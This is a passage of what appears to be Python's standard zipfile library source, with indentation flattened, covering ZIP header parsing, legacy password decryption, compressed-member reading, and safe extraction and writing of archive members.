# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, -sizeEndCentDir, endrec)
# Either this is not a ZIP file, or it is a ZIP file with an archive
# comment. Search the end of the file for the "end of central directory"
# record signature. The comment is the last item in the ZIP file and may be
# up to 64K long. It is assumed that the "end of central directory" magic
# number does not appear in the comment.
maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0)
fpin.seek(maxCommentStart, 0)
data = fpin.read()
start = data.rfind(stringEndArchive)
if start >= 0:
# found the magic number; attempt to unpack and interpret
recData = data[start:start+sizeEndCentDir]
if len(recData) != sizeEndCentDir:
# Zip file is corrupted.
return None
endrec = list(struct.unpack(structEndArchive, recData))
commentSize = endrec[_ECD_COMMENT_SIZE] #as claimed by the zip file
comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize]
endrec.append(comment)
endrec.append(maxCommentStart + start)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, maxCommentStart + start - filesize,
endrec)
# Unable to find a valid end of central directory structure
return None
class ZipInfo (object):
"""Class with attributes describing each file in the ZIP archive."""
__slots__ = (
'orig_filename',
'filename',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'CRC',
'compress_size',
'file_size',
'_raw_time',
)
def __init__(self, filename="NoName", date_time=(1980,1,1,0,0,0)):
self.orig_filename = filename # Original file name in archive
# Terminate the file name at the first null byte. Null bytes in file
# names are used as tricks by viruses in archives.
null_byte = filename.find(chr(0))
if null_byte >= 0:
filename = filename[0:null_byte]
# This is used to ensure paths in generated ZIP files always use
# forward slashes as the directory separator, as required by the
# ZIP format specification.
if os.sep != "/" and os.sep in filename:
filename = filename.replace(os.sep, "/")
self.filename = filename # Normalized file name
self.date_time = date_time # year, month, day, hour, min, sec
if date_time[0] < 1980:
raise ValueError('ZIP does not support timestamps before 1980')
# Standard values:
self.compress_type = ZIP_STORED # Type of compression for the file
self.comment = b"" # Comment for each file
self.extra = b"" # ZIP extra data
if sys.platform == 'win32':
self.create_system = 0 # System which created ZIP archive
else:
# Assume everything else is unix-y
self.create_system = 3 # System which created ZIP archive
self.create_version = DEFAULT_VERSION # Version which created ZIP archive
self.extract_version = DEFAULT_VERSION # Version needed to extract archive
self.reserved = 0 # Must be zero
self.flag_bits = 0 # ZIP flag bits
self.volume = 0 # Volume number of file header
self.internal_attr = 0 # Internal attributes
self.external_attr = 0 # External file attributes
# Other attributes are set by class ZipFile:
# header_offset Byte offset to the file header
# CRC CRC-32 of the uncompressed file
# compress_size Size of the compressed file
# file_size Size of the uncompressed file
def FileHeader(self, zip64=None):
"""Return the per-file header as a string."""
dt = self.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
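        # Worked example of the two DOS-format words above (illustrative values only):
        #   date_time (2015, 5, 14, 9, 53, 42) gives
        #   dosdate = (35 << 9) | (5 << 5) | 14 = 0x46AE
        #   dostime = (9 << 11) | (53 << 5) | 21 = 0x4EB5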
if self.flag_bits & 0x08:
# Set these to zero because we write them after the file data
CRC = compress_size = file_size = 0
else:
CRC = self.CRC
compress_size = self.compress_size
file_size = self.file_size
extra = self.extra
min_version = 0
if zip64 is None:
zip64 = file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT
if zip64:
fmt = '<HHQQ'
extra = extra + struct.pack(fmt,
1, struct.calcsize(fmt)-4, file_size, compress_size)
if file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT:
if not zip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
# File is larger than what fits into a 4 byte integer,
# fall back to the ZIP64 extension
file_size = 0xffffffff
compress_size = 0xffffffff
min_version = ZIP64_VERSION
if self.compress_type == ZIP_BZIP2:
min_version = max(BZIP2_VERSION, min_version)
elif self.compress_type == ZIP_LZMA:
min_version = max(LZMA_VERSION, min_version)
self.extract_version = max(min_version, self.extract_version)
self.create_version = max(min_version, self.create_version)
filename, flag_bits = self._encodeFilenameFlags()
header = struct.pack(structFileHeader, stringFileHeader,
self.extract_version, self.reserved, flag_bits,
self.compress_type, dostime, dosdate, CRC,
compress_size, file_size,
len(filename), len(extra))
return header + filename + extra
def _encodeFilenameFlags(self):
try:
return self.filename.encode('ascii'), self.flag_bits
except UnicodeEncodeError:
return self.filename.encode('utf-8'), self.flag_bits | 0x800
def _decodeExtra(self):
# Try to decode the extra field.
extra = self.extra
unpack = struct.unpack
while extra:
tp, ln = unpack('<HH', extra[:4])
if tp == 1:
if ln >= 24:
counts = unpack('<QQQ', extra[4:28])
elif ln == 16:
counts = unpack('<QQ', extra[4:20])
elif ln == 8:
counts = unpack('<Q', extra[4:12])
elif ln == 0:
counts = ()
else:
raise RuntimeError("Corrupt extra field %s"%(ln,))
idx = 0
# ZIP64 extension (large files and/or large archives)
if self.file_size in (0xffffffffffffffff, 0xffffffff):
self.file_size = counts[idx]
idx += 1
if self.compress_size == 0xFFFFFFFF:
self.compress_size = counts[idx]
idx += 1
if self.header_offset == 0xffffffff:
old = self.header_offset
self.header_offset = counts[idx]
idx+=1
extra = extra[ln+4:]
class _ZipDecrypter:
"""Class to handle decryption of files stored within a ZIP archive.
ZIP supports a password-based form of encryption. Even though known
plaintext attacks have been found against it, it is still useful
to be able to get data out of such a file.
Usage:
zd = _ZipDecrypter(mypwd)
plain_char = zd(cypher_char)
plain_text = map(zd, cypher_text)
"""
def _GenerateCRCTable():
"""Generate a CRC-32 table.
ZIP encryption uses the CRC32 one-byte primitive for scrambling some
internal keys. We noticed that a direct implementation is faster than
relying on binascii.crc32().
"""
poly = 0xedb88320
table = [0] * 256
for i in range(256):
crc = i
for j in range(8):
if crc & 1:
crc = ((crc >> 1) & 0x7FFFFFFF) ^ poly
else:
crc = ((crc >> 1) & 0x7FFFFFFF)
table[i] = crc
return table
crctable = _GenerateCRCTable()
def _crc32(self, ch, crc):
"""Compute the CRC32 primitive on one byte."""
return ((crc >> 8) & 0xffffff) ^ self.crctable[(crc ^ ch) & 0xff]
def __init__(self, pwd):
self.key0 = 305419896
self.key1 = 591751049
self.key2 = 878082192
for p in pwd:
self._UpdateKeys(p)
def _UpdateKeys(self, c):
self.key0 = self._crc32(c, self.key0)
self.key1 = (self.key1 + (self.key0 & 255)) & 4294967295
self.key1 = (self.key1 * 134775813 + 1) & 4294967295
self.key2 = self._crc32((self.key1 >> 24) & 255, self.key2)
def __call__(self, c):
"""Decrypt a single character."""
assert isinstance(c, int)
k = self.key2 | 2
c = c ^ (((k * (k^1)) >> 8) & 255)
self._UpdateKeys(c)
return c
class LZMACompressor:
def __init__(self):
self._comp = None
def _init(self):
props = lzma._encode_filter_properties({'id': lzma.FILTER_LZMA1})
self._comp = lzma.LZMACompressor(lzma.FORMAT_RAW, filters=[
lzma._decode_filter_properties(lzma.FILTER_LZMA1, props)
])
return struct.pack('<BBH', 9, 4, len(props)) + props
def compress(self, data):
if self._comp is None:
return self._init() + self._comp.compress(data)
return self._comp.compress(data)
def flush(self):
if self._comp is None:
return self._init() + self._comp.flush()
return self._comp.flush()
class LZMADecompressor:
def __init__(self):
self._decomp = None
self._unconsumed = b''
self.eof = False
def decompress(self, data):
if self._decomp is None:
self._unconsumed += data
if len(self._unconsumed) <= 4:
return b''
psize, = struct.unpack('<H', self._unconsumed[2:4])
if len(self._unconsumed) <= 4 + psize:
return b''
self._decomp = lzma.LZMADecompressor(lzma.FORMAT_RAW, filters=[
lzma._decode_filter_properties(lzma.FILTER_LZMA1,
self._unconsumed[4:4 + psize])
])
data = self._unconsumed[4 + psize:]
del self._unconsumed
result = self._decomp.decompress(data)
self.eof = self._decomp.eof
return result
compressor_names = {
0: 'store',
1: 'shrink',
2: 'reduce',
3: 'reduce',
4: 'reduce',
5: 'reduce',
6: 'implode',
7: 'tokenize',
8: 'deflate',
9: 'deflate64',
10: 'implode',
12: 'bzip2',
14: 'lzma',
18: 'terse',
19: 'lz77',
97: 'wavpack',
98: 'ppmd',
}
def _check_compression(compression):
if compression == ZIP_STORED:
pass
elif compression == ZIP_DEFLATED:
if not zlib:
raise RuntimeError(
"Compression requires the (missing) zlib module")
elif compression == ZIP_BZIP2:
if not bz2:
raise RuntimeError(
"Compression requires the (missing) bz2 module")
elif compression == ZIP_LZMA:
if not lzma:
raise RuntimeError(
"Compression requires the (missing) lzma module")
else:
raise RuntimeError("That compression method is not supported")
def _get_compressor(compress_type):
if compress_type == ZIP_DEFLATED:
return zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -15)
elif compress_type == ZIP_BZIP2:
return bz2.BZ2Compressor()
elif compress_type == ZIP_LZMA:
return LZMACompressor()
else:
return None
def _get_decompressor(compress_type):
if compress_type == ZIP_STORED:
return None
elif compress_type == ZIP_DEFLATED:
return zlib.decompressobj(-15)
elif compress_type == ZIP_BZIP2:
return bz2.BZ2Decompressor()
elif compress_type == ZIP_LZMA:
return LZMADecompressor()
else:
descr = compressor_names.get(compress_type)
if descr:
raise NotImplementedError("compression type %d (%s)" % (compress_type, descr))
else:
raise NotImplementedError("compression type %d" % (compress_type,))
class ZipExtFile(io.BufferedIOBase):
"""File-like object for reading an archive member.
Is returned by ZipFile.open().
"""
# Max size supported by decompressor.
MAX_N = 1 << 31 - 1
# Read from compressed files in 4k blocks.
MIN_READ_SIZE = 4096
# Search for universal newlines or line chunks.
PATTERN = re.compile(br'^(?P<chunk>[^\r\n]+)|(?P<newline>\n|\r\n?)')
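    # Rough sketch of how PATTERN splits readahead bytes (assumed inputs):
    #   PATTERN.search(b'abc\r\nxyz').group('chunk')  -> b'abc'
    #   PATTERN.search(b'\r\nxyz').group('newline')   -> b'\r\n'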
def __init__(self, fileobj, mode, zipinfo, decrypter=None,
close_fileobj=False):
self._fileobj = fileobj
self._decrypter = decrypter
self._close_fileobj = close_fileobj
self._compress_type = zipinfo.compress_type
self._compress_left = zipinfo.compress_size
self._left = zipinfo.file_size
self._decompressor = _get_decompressor(self._compress_type)
self._eof = False
self._readbuffer = b''
self._offset = 0
self._universal = 'U' in mode
self.newlines = None
# Adjust read size for encrypted files since the first 12 bytes
# are for the encryption/password information.
if self._decrypter is not None:
self._compress_left -= 12
self.mode = mode
self.name = zipinfo.filename
if hasattr(zipinfo, 'CRC'):
self._expected_crc = zipinfo.CRC
self._running_crc = crc32(b'') & 0xffffffff
else:
self._expected_crc = None
def readline(self, limit=-1):
"""Read and return a line from the stream.
If limit is specified, at most limit bytes will be read.
"""
if not self._universal and limit < 0:
# Shortcut common case - newline found in buffer.
i = self._readbuffer.find(b'\n', self._offset) + 1
if i > 0:
line = self._readbuffer[self._offset: i]
self._offset = i
return line
if not self._universal:
return io.BufferedIOBase.readline(self, limit)
line = b''
while limit < 0 or len(line) < limit:
readahead = self.peek(2)
if readahead == b'':
return line
#
# Search for universal newlines or line chunks.
#
# The pattern returns either a line chunk or a newline, but not
# both. Combined with peek(2), we are assured that the sequence
# '\r\n' is always retrieved completely and never split into
# separate newlines - '\r', '\n' due to coincidental readaheads.
#
match = self.PATTERN.search(readahead)
newline = match.group('newline')
if newline is not None:
if self.newlines is None:
self.newlines = []
if newline not in self.newlines:
self.newlines.append(newline)
self._offset += len(newline)
return line + b'\n'
chunk = match.group('chunk')
if limit >= 0:
chunk = chunk[: limit - len(line)]
self._offset += len(chunk)
line += chunk
return line
def peek(self, n=1):
"""Returns buffered bytes without advancing the position."""
if n > len(self._readbuffer) - self._offset:
chunk = self.read(n)
if len(chunk) > self._offset:
self._readbuffer = chunk + self._readbuffer[self._offset:]
self._offset = 0
else:
self._offset -= len(chunk)
# Return up to 512 bytes to reduce allocation overhead for tight loops.
return self._readbuffer[self._offset: self._offset + 512]
def readable(self):
return True
def read(self, n=-1):
"""Read and return up to n bytes.
        If the argument is omitted, None, or negative, data is read and returned until EOF is reached.
"""
if n is None or n < 0:
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while not self._eof:
buf += self._read1(self.MAX_N)
return buf
end = n + self._offset
if end < len(self._readbuffer):
buf = self._readbuffer[self._offset:end]
self._offset = end
return buf
n = end - len(self._readbuffer)
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while n > 0 and not self._eof:
data = self._read1(n)
if n < len(data):
self._readbuffer = data
self._offset = n
buf += data[:n]
break
buf += data
n -= len(data)
return buf
def _update_crc(self, newdata):
# Update the CRC using the given data.
if self._expected_crc is None:
# No need to compute the CRC if we don't have a reference value
return
self._running_crc = crc32(newdata, self._running_crc) & 0xffffffff
# Check the CRC if we're at the end of the file
if self._eof and self._running_crc != self._expected_crc:
raise BadZipFile("Bad CRC-32 for file %r" % self.name)
def read1(self, n):
"""Read up to n bytes with at most one read() system call."""
if n is None or n < 0:
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while not self._eof:
data = self._read1(self.MAX_N)
if data:
buf += data
break
return buf
end = n + self._offset
if end < len(self._readbuffer):
buf = self._readbuffer[self._offset:end]
self._offset = end
return buf
n = end - len(self._readbuffer)
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
if n > 0:
while not self._eof:
data = self._read1(n)
if n < len(data):
self._readbuffer = data
self._offset = n
buf += data[:n]
break
if data:
buf += data
break
return buf
def _read1(self, n):
# Read up to n compressed bytes with at most one read() system call,
# decrypt and decompress them.
if self._eof or n <= 0:
return b''
# Read from file.
if self._compress_type == ZIP_DEFLATED:
## Handle unconsumed data.
data = self._decompressor.unconsumed_tail
if n > len(data):
data += self._read2(n - len(data))
else:
data = self._read2(n)
if self._compress_type == ZIP_STORED:
self._eof = self._compress_left <= 0
elif self._compress_type == ZIP_DEFLATED:
n = max(n, self.MIN_READ_SIZE)
data = self._decompressor.decompress(data, n)
self._eof = (self._decompressor.eof or
self._compress_left <= 0 and
not self._decompressor.unconsumed_tail)
if self._eof:
data += self._decompressor.flush()
else:
data = self._decompressor.decompress(data)
self._eof = self._decompressor.eof or self._compress_left <= 0
data = data[:self._left]
self._left -= len(data)
if self._left <= 0:
self._eof = True
self._update_crc(data)
return data
def _read2(self, n):
if self._compress_left <= 0:
return b''
n = max(n, self.MIN_READ_SIZE)
n = min(n, self._compress_left)
data = self._fileobj.read(n)
self._compress_left -= len(data)
if self._decrypter is not None:
data = bytes(map(self._decrypter, data))
return data
def close(self):
try:
if self._close_fileobj:
self._fileobj.close()
finally:
super().close()
class ZipFile:
""" Class with methods to open, read, write, close, list zip files.
z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=False)
file: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib),
ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma).
allowZip64: if True ZipFile will create files with ZIP64 extensions when
needed, otherwise it will raise an exception when this would
be necessary.
"""
fp = None # Set here since __del__ checks it
_windows_illegal_name_trans_table = None
def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
"""Open the ZIP file with mode read "r", write "w" or append "a"."""
if mode not in ("r", "w", "a"):
raise RuntimeError('ZipFile() requires mode "r", "w", or "a"')
_check_compression(compression)
self._allowZip64 = allowZip64
self._didModify = False
self.debug = 0 # Level of printing: 0 through 3
self.NameToInfo = {} # Find file info given name
self.filelist = [] # List of ZipInfo instances for archive
self.compression = compression # Method of compression
self.mode = key = mode.replace('b', '')[0]
self.pwd = None
self._comment = b''
# Check if we were passed a file-like object
if isinstance(file, str):
# No, it's a filename
self._filePassed = 0
self.filename = file
modeDict = {'r' : 'rb', 'w': 'wb', 'a' : 'r+b'}
try:
self.fp = io.open(file, modeDict[mode])
except IOError:
if mode == 'a':
mode = key = 'w'
self.fp = io.open(file, modeDict[mode])
else:
raise
else:
self._filePassed = 1
self.fp = file
self.filename = getattr(file, 'name', None)
try:
if key == 'r':
self._RealGetContents()
elif key == 'w':
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
elif key == 'a':
try:
# See if file is a zip file
self._RealGetContents()
# seek to start of directory and overwrite
self.fp.seek(self.start_dir, 0)
except BadZipFile:
# file is not a zip file, just append
self.fp.seek(0, 2)
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
else:
raise RuntimeError('Mode must be "r", "w" or "a"')
except:
fp = self.fp
self.fp = None
if not self._filePassed:
fp.close()
raise
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _RealGetContents(self):
"""Read in the table of contents for the ZIP file."""
fp = self.fp
try:
endrec = _EndRecData(fp)
except IOError:
raise BadZipFile("File is not a zip file")
if not endrec:
raise BadZipFile("File is not a zip file")
if self.debug > 1:
print(endrec)
size_cd = endrec[_ECD_SIZE] # bytes in central directory
offset_cd = endrec[_ECD_OFFSET] # offset of central directory
self._comment = endrec[_ECD_COMMENT] # archive comment
# "concat" is zero, unless zip was concatenated to another file
concat = endrec[_ECD_LOCATION] - size_cd - offset_cd
if endrec[_ECD_SIGNATURE] == stringEndArchive64:
# If Zip64 extension structures are present, account for them
concat -= (sizeEndCentDir64 + sizeEndCentDir64Locator)
if self.debug > 2:
inferred = concat + offset_cd
print("given, inferred, offset", offset_cd, inferred, concat)
# self.start_dir: Position of start of central directory
self.start_dir = offset_cd + concat
fp.seek(self.start_dir, 0)
data = fp.read(size_cd)
fp = io.BytesIO(data)
total = 0
while total < size_cd:
centdir = fp.read(sizeCentralDir)
if len(centdir) != sizeCentralDir:
raise BadZipFile("Truncated central directory")
centdir = struct.unpack(structCentralDir, centdir)
if centdir[_CD_SIGNATURE] != stringCentralDir:
raise BadZipFile("Bad magic number for central directory")
if self.debug > 2:
print(centdir)
filename = fp.read(centdir[_CD_FILENAME_LENGTH])
flags = centdir[5]
if flags & 0x800:
# UTF-8 file names extension
filename = filename.decode('utf-8')
else:
# Historical ZIP filename encoding
filename = filename.decode('cp437')
# Create ZipInfo instance to store file information
x = ZipInfo(filename)
x.extra = fp.read(centdir[_CD_EXTRA_FIELD_LENGTH])
x.comment = fp.read(centdir[_CD_COMMENT_LENGTH])
x.header_offset = centdir[_CD_LOCAL_HEADER_OFFSET]
(x.create_version, x.create_system, x.extract_version, x.reserved,
x.flag_bits, x.compress_type, t, d,
x.CRC, x.compress_size, x.file_size) = centdir[1:12]
if x.extract_version > MAX_EXTRACT_VERSION:
raise NotImplementedError("zip file version %.1f" %
(x.extract_version / 10))
x.volume, x.internal_attr, x.external_attr = centdir[15:18]
# Convert date/time code to (year, month, day, hour, min, sec)
x._raw_time = t
x.date_time = ( (d>>9)+1980, (d>>5)&0xF, d&0x1F,
t>>11, (t>>5)&0x3F, (t&0x1F) * 2 )
x._decodeExtra()
x.header_offset = x.header_offset + concat
self.filelist.append(x)
self.NameToInfo[x.filename] = x
# update total bytes read from central directory
total = (total + sizeCentralDir + centdir[_CD_FILENAME_LENGTH]
+ centdir[_CD_EXTRA_FIELD_LENGTH]
+ centdir[_CD_COMMENT_LENGTH])
if self.debug > 2:
print("total", total)
def namelist(self):
"""Return a list of file names in the archive."""
return [data.filename for data in self.filelist]
def infolist(self):
"""Return a list of class ZipInfo instances for files in the
archive."""
return self.filelist
def printdir(self, file=None):
"""Print a table of contents for the zip file."""
print("%-46s %19s %12s" % ("File Name", "Modified ", "Size"),
file=file)
for zinfo in self.filelist:
date = "%d-%02d-%02d %02d:%02d:%02d" % zinfo.date_time[:6]
print("%-46s %s %12d" % (zinfo.filename, date, zinfo.file_size),
file=file)
def testzip(self):
"""Read all the files and check the CRC."""
chunk_size = 2 ** 20
for zinfo in self.filelist:
try:
# Read by chunks, to avoid an OverflowError or a
# MemoryError with very large embedded files.
with self.open(zinfo.filename, "r") as f:
while f.read(chunk_size): # Check CRC-32
pass
except BadZipFile:
return zinfo.filename
def getinfo(self, name):
"""Return the instance of ZipInfo given 'name'."""
info = self.NameToInfo.get(name)
if info is None:
raise KeyError(
'There is no item named %r in the archive' % name)
return info
def setpassword(self, pwd):
"""Set default password for encrypted files."""
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if pwd:
self.pwd = pwd
else:
self.pwd = None
@property
def comment(self):
"""The comment text associated with the ZIP file."""
return self._comment
@comment.setter
def comment(self, comment):
if not isinstance(comment, bytes):
raise TypeError("comment: expected bytes, got %s" % type(comment))
# check for valid comment length
if len(comment) >= ZIP_MAX_COMMENT:
if self.debug:
print('Archive comment is too long; truncating to %d bytes'
% ZIP_MAX_COMMENT)
comment = comment[:ZIP_MAX_COMMENT]
self._comment = comment
self._didModify = True
def read(self, name, pwd=None):
"""Return file bytes (as a string) for name."""
with self.open(name, "r", pwd) as fp:
return fp.read()
def open(self, name, mode="r", pwd=None):
"""Return file-like object for 'name'."""
if mode not in ("r", "U", "rU"):
raise RuntimeError('open() requires mode "r", "U", or "rU"')
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if not self.fp:
raise RuntimeError(
"Attempt to read ZIP archive that was already closed")
# Only open a new file for instances where we were not
# given a file object in the constructor
if self._filePassed:
zef_file = self.fp
else:
zef_file = io.open(self.filename, 'rb')
try:
# Make sure we have an info object
if isinstance(name, ZipInfo):
# 'name' is already an info object
zinfo = name
else:
# Get info object for name
zinfo = self.getinfo(name)
zef_file.seek(zinfo.header_offset, 0)
# Skip the file header:
fheader = zef_file.read(sizeFileHeader)
if len(fheader) != sizeFileHeader:
raise BadZipFile("Truncated file header")
fheader = struct.unpack(structFileHeader, fheader)
if fheader[_FH_SIGNATURE] != stringFileHeader:
raise BadZipFile("Bad magic number for file header")
fname = zef_file.read(fheader[_FH_FILENAME_LENGTH])
if fheader[_FH_EXTRA_FIELD_LENGTH]:
zef_file.read(fheader[_FH_EXTRA_FIELD_LENGTH])
if zinfo.flag_bits & 0x20:
# Zip 2.7: compressed patched data
raise NotImplementedError("compressed patched data (flag bit 5)")
if zinfo.flag_bits & 0x40:
# strong encryption
raise NotImplementedError("strong encryption (flag bit 6)")
if zinfo.flag_bits & 0x800:
# UTF-8 filename
fname_str = fname.decode("utf-8")
else:
fname_str = fname.decode("cp437")
if fname_str != zinfo.orig_filename:
raise BadZipFile(
'File name in directory %r and header %r differ.'
% (zinfo.orig_filename, fname))
# check for encrypted flag & handle password
is_encrypted = zinfo.flag_bits & 0x1
zd = None
if is_encrypted:
if not pwd:
pwd = self.pwd
if not pwd:
raise RuntimeError("File %s is encrypted, password "
"required for extraction" % name)
zd = _ZipDecrypter(pwd)
# The first 12 bytes in the cypher stream is an encryption header
# used to strengthen the algorithm. The first 11 bytes are
# completely random, while the 12th contains the MSB of the CRC,
# or the MSB of the file time depending on the header type
# and is used to check the correctness of the password.
header = zef_file.read(12)
h = list(map(zd, header[0:12]))
if zinfo.flag_bits & 0x8:
# compare against the file type from extended local headers
check_byte = (zinfo._raw_time >> 8) & 0xff
else:
# compare against the CRC otherwise
check_byte = (zinfo.CRC >> 24) & 0xff
if h[11] != check_byte:
raise RuntimeError("Bad password for file", name)
return ZipExtFile(zef_file, mode, zinfo, zd,
close_fileobj=not self._filePassed)
except:
if not self._filePassed:
zef_file.close()
raise
def extract(self, member, path=None, pwd=None):
"""Extract a member from the archive to the current working directory,
using its full name. Its file information is extracted as accurately
as possible. `member' may be a filename or a ZipInfo object. You can
specify a different directory using `path'.
"""
if not isinstance(member, ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
return self._extract_member(member, path, pwd)
def extractall(self, path=None, members=None, pwd=None):
"""Extract all members from the archive to the current working
directory. `path' specifies a different directory to extract to.
`members' is optional and must be a subset of the list returned
by namelist().
"""
if members is None:
members = self.namelist()
for zipinfo in members:
self.extract(zipinfo, path, pwd)
@classmethod
def _sanitize_windows_name(cls, arcname, pathsep):
"""Replace bad characters and remove trailing dots from parts."""
table = cls._windows_illegal_name_trans_table
if not table:
illegal = ':<>|"?*'
table = str.maketrans(illegal, '_' * len(illegal))
cls._windows_illegal_name_trans_table = table
arcname = arcname.translate(table)
# remove trailing dots
arcname = (x.rstrip('.') for x in arcname.split(pathsep))
# rejoin, removing empty parts.
arcname = pathsep.join(x for x in arcname if x)
return arcname
def _extract_member(self, member, targetpath, pwd):
"""Extract the ZipInfo object 'member' to a physical
file on the path targetpath.
"""
# build the destination pathname, replacing
# forward slashes to platform specific separators.
arcname = member.filename.replace('/', os.path.sep)
if os.path.altsep:
arcname = arcname.replace(os.path.altsep, os.path.sep)
# interpret absolute pathname as relative, remove drive letter or
# UNC path, redundant separators, "." and ".." components.
arcname = os.path.splitdrive(arcname)[1]
invalid_path_parts = ('', os.path.curdir, os.path.pardir)
arcname = os.path.sep.join(x for x in arcname.split(os.path.sep)
if x not in invalid_path_parts)
if os.path.sep == '\\':
# filter illegal characters on Windows
arcname = self._sanitize_windows_name(arcname, os.path.sep)
targetpath = os.path.join(targetpath, arcname)
targetpath = os.path.normpath(targetpath)
# Create all upper directories if necessary.
upperdirs = os.path.dirname(targetpath)
if upperdirs and not os.path.exists(upperdirs):
os.makedirs(upperdirs)
if member.filename[-1] == '/':
if not os.path.isdir(targetpath):
os.mkdir(targetpath)
return targetpath
with self.open(member, pwd=pwd) as source, \
open(targetpath, "wb") as target:
shutil.copyfileobj(source, target)
return targetpath
def _writecheck(self, zinfo):
"""Check for errors before writing a file to the archive."""
if zinfo.filename in self.NameToInfo:
if self.debug: # Warning for duplicate names
print("Duplicate name:", zinfo.filename)
if self.mode not in ("w", "a"):
raise RuntimeError('write() requires mode "w" or "a"')
if not self.fp:
raise RuntimeError(
"Attempt to write ZIP archive that was already closed")
_check_compression(zinfo.compress_type)
if zinfo.file_size > ZIP64_LIMIT:
if not self._allowZip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
if zinfo.header_offset > ZIP64_LIMIT:
if not self._allowZip64:
raise LargeZipFile(
"Zipfile size would require ZIP64 extensions")
def write(self, filename, arcname=None, compress_type=None):
"""Put the bytes from filename into the archive under the name
arcname."""
if not self.fp:
raise RuntimeError(
"Attempt to write to ZIP archive that was already closed")
st = os.stat(filename)
isdir = stat.S_ISDIR(st.st_mode)
mtime = time.localtime(st.st_mtime)
date_time = mtime[0:6]
# Create ZipInfo instance to store file information
if arcname is None:
arcname = filename
arcname = os.path.normpath(os.path.splitdrive(arcname)[1])
while arcname[0] in (os.sep, os.altsep):
arcname = arcname[1:]
if isdir:
arcname += '/'
zinfo = ZipInfo(arcname, date_time)
zinfo.external_attr = (st[0] & 0xFFFF) << 16 # Unix attributes
if compress_type is None:
zinfo.compress_type = self.compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = st.st_size
zinfo.flag_bits = 0x00
zinfo.header_offset = self.fp.tell() # Start of header bytes
if zinfo.compress_type == ZIP_LZMA:
# Compressed data includes an end-of-stream (EOS) marker
zinfo.flag_bits |= 0x02
self._writecheck(zinfo)
self._didModify = True
if isdir:
zinfo.file_size = 0
zinfo.compress_size = 0
zinfo.CRC = 0
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
self.fp.write(zinfo.FileHeader(False))
return
cmpr = _get_compressor(zinfo.compress_type)
with open(filename, "rb") as fp:
# Must overwrite CRC and sizes with correct data later
zinfo.CRC = CRC = 0
zinfo.compress_size = compress_size = 0
# Compressed size can be larger than uncompressed size
zip64 = self._allowZip64 and \
zinfo.file_size * 1.05 > ZIP64_LIMIT
self.fp.write(zinfo.FileHeader(zip64))
file_size = 0
while 1:
buf = fp.read(1024 * 8)
if not buf:
break
file_size = file_size + len(buf)
CRC = crc32(buf, CRC) & 0xffffffff
if cmpr:
buf = cmpr.compress(buf)
compress_size = compress_size + len(buf)
self.fp.write(buf)
if cmpr:
buf = cmpr.flush()
compress_size = compress_size + len(buf)
self.fp.write(buf)
zinfo.compress_size = compress_size
else:
zinfo.compress_size = file_size
zinfo.CRC = CRC
zinfo.file_size = file_size
if not zip64 and self._allowZip64:
if file_size > ZIP64_LIMIT:
raise RuntimeError('File size has increased during compressing')
if compress_size > ZIP64_LIMIT:
raise RuntimeError('Compressed size larger than uncompressed size')
# Seek backwards and write file header (which will now include
# correct CRC and file sizes)
position = self.fp.tell() # Preserve current position in file
self.fp.seek(zinfo.header_offset, 0)
self.fp.write(zinfo.FileHeader(zip64))
self.fp.seek(position, 0)
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
    def writestr(self, zinfo_or_arcname, data, compress_type=None):
        """Write a file into the archive. The contents are 'data', which
may be either a 'str' or a 'bytes' instance; if it is a 'str',
it is encoded as UTF-8 first.
'zinfo_or_arcname' is either a ZipInfo instance or
the name of the file in the archive."""
if isinstance(data, str):
data = data.encode("utf-8")
if not isinstance(zinfo_or_arcname, ZipInfo):
zinfo = ZipInfo(filename=zinfo_or_arcname,
date_time=time.localtime(time.time())[:6])
zinfo.compress_type = self.compression
zinfo.external_attr = 0o600 << 16
else:
zinfo = zinfo_or_arcname
if not self.fp:
raise RuntimeError(
"Attempt to write to ZIP archive that was already closed")
zinfo.file_size = len(data) # Uncompressed size
zinfo.header_offset = self.fp.tell() # Start of header data
if compress_type is not None:
zinfo.compress_type = compress_type
if zinfo.compress_type == ZIP_LZMA:
# Compressed data includes an end-of-stream (EOS) marker
zinfo.flag_bits |= 0x02
self._writecheck(zinfo)
self._didModify = True
zinfo.CRC = crc32(data) & 0xffffffff # CRC-32 checksum
co = _get_compressor(zinfo.compress_type)
if co:
data = co.compress(data) + co.flush()
zinfo.compress_size = len(data) # Compressed size
else:
zinfo.compress_size = zinfo.file_size
zip64 = zinfo.file_size > ZIP64_LIMIT or \
